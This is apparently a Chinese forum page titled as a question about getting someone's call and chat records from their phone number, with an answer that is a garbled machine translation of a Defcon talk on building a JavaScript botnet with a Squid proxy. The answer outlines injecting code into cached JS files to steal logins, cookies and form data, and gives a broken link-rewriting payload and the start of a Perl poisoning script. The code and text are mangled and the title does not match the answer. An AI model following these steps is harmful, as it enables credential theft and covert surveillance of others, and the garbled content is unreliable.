知道对方手机号码,如何才能查找对方通话聊天记录

为什么自由代理人是“自由的”?Chema Alonso最近在Defcon 20大会上谈到了如何从头开始创建一个javascript僵尸网络,以及如何使用它来查找欺诈者和黑客。一切都是通过一个Squid代理和一些小的配置更改完成的。这个想法很简单:1.
请先 登录 后评论

1 个回答

匿名用户
最近,恰巧,Chema Alonso谈到了如何从头开始创建一个javascript僵尸网络,以及如何使用它在会议上找到骗子和黑客,&160;defcon 20。一切都是通过一个Squid代理和一些小的配置更改完成的。这个想法很简单:1.[服务器]安装Squid 2。[有效负载]在Linux服务器上,修改服务器配置,并将一些代码插入所有传输的javascript文件中。此代码的功能是将用户数据传输到服务器,例如用户在表单中输入的所有数据。三。[缓存]尽可能延长修改后的JS文件的缓存时间。可能发生的最糟糕的事情是什么?当有人强迫您加载受感染的JS文件时,他们可以:从您访问的网站(从登录表单或cookie)中窃取登录信息,窃取您的银行帐户或信用卡信息,强制您参与ddos攻击,让您的浏览器每秒加载数百次网站,并通过iframe或scrip发送请求。T(脚本)。基本上,你在网上做的所有事情都可以看到(包括你读鼠标的位置)https。如果您的网站加载了一些不安全的资源(例如来自HTTP站点的jquery),这种技术也可以用于https链接。大多数浏览器提醒您,有些浏览器甚至阻止您访问不安全的内容,但没有人注意到浏览器地址栏中的“锁定”标志。例如,安全性:不安全性:在介绍中,Chema说他会将修改后的服务器IP地址发布到网络上,并且在几天内会有5000多人使用代理。大多数人使用代理来做坏事,因为他们都知道在网络上使用代理会变成匿名的,似乎很多人没有考虑到这个问题:代理也可以对他们做坏事。我想知道这是否真的那么简单,所以我构建了一个运行Debian(Linux的发行版)的虚拟机,并努力实现这些概念。编写您自己的JS来感染代理,假设您有一个运行squid的代理,并且您还需要一个网站服务器,例如以/var/www作为根目录的Apache服务器(默认设置)。步骤1:创建有效负载。我将使用一个简单的脚本获取页面上的所有链接,然后将href属性重写到我的网站。/etc/squid/payload.js12用于(var i=0;i<;document.getElements bytagname('a')。length;i++)&160;&160;&160;&document.getElements bytagName('a')[i][href=“https://hasg.chek.at”;步骤2:将脚本插入所有请求的JS文件。/etc/squid/poison.pl1234567891011121111516171819212223!/usr/bin/perl&160;$=1;$count=0;$pid=$;&while 160;
请先 登录 后评论